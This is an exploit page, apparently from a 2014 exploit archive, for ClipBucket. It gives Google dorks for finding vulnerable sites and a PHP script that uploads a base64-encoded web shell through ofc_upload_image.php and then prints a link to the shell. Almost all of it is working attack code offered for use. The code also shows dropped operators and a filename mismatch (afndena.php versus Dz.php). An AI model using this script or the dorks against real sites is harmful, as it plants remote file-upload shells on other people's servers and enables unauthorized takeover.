facebook facebook twitter rss

ClipBucket Code Injection To Remote Upload

Author: Dr.AFN[D]ENA , Published: 15-12-2014

<form method="POST">

<h3>Exploit ClipBucket </h3>
<h5>Dork : inurl:view_group_members.php</h5>
<h5>Dork : intext:Forged by ClipBucket=</h5>
<h5>Dork : inurl:"view_page.php?pid="+int­ext:"video"</h5>
 
<input type="text" name="host" size=50 />
<input type="submit" value="upload" name="go" />
</form>
<?php
/*
* ClipBucket Code Injection To Remote Upload
* By Dr.AFN[D]ENA
*/

if(isset($_POST['go']) and $_POST['host'] != "" ){
$host $_POST['host'];
$x00x curl_init();
curl_setopt($x00xCURLOPT_URL,$host."/admin_area/charts/ofc-library/ofc_upload_image.php?name=afndena.php");
curl_setopt($x00xCURLOPT_POST1);
curl_setopt($x00xCURLOPT_HTTPHEADER, array('Content-Type: text/plain'));
curl_setopt($x00xCURLOPT_POSTFIELDS,"<? eval(base64_decode(\"ZWNobyAnPGI+YnkgeDAweF9CT1Q8YnI+PGJyPicucGhwX3VuYW1lKCkuJzxicj48L2I+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsKZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CmlmKCRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiKXsKaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpewplY2hvICc8Yj5GaWxlIFVwbG9hZGVkIF5fXjwvYj48YnI+PGJyPic7Cn1lbHNlewplY2hvICc8Yj5VcGxvYWQgRmFpbCAhISE8L2I+PGJyPjxicj4nOwp9Cn0=\")); ?>");
curl_setopt($x00x,CURLOPT_RETURNTRANSFER,1);
$res curl_exec($x00x);
$test get_headers("$host/admin_area/charts/tmp-upload-images/Dz.php");
if(
eregi("200",$test[0])){
echo 
"[+] Upload Link : <a href=\"$host/admin_area/charts/tmp-upload-images/Dz.php\" > Here </a>";
}else {echo 
"[+] Exploit Filed";}
}
?>

Like us on Facebook :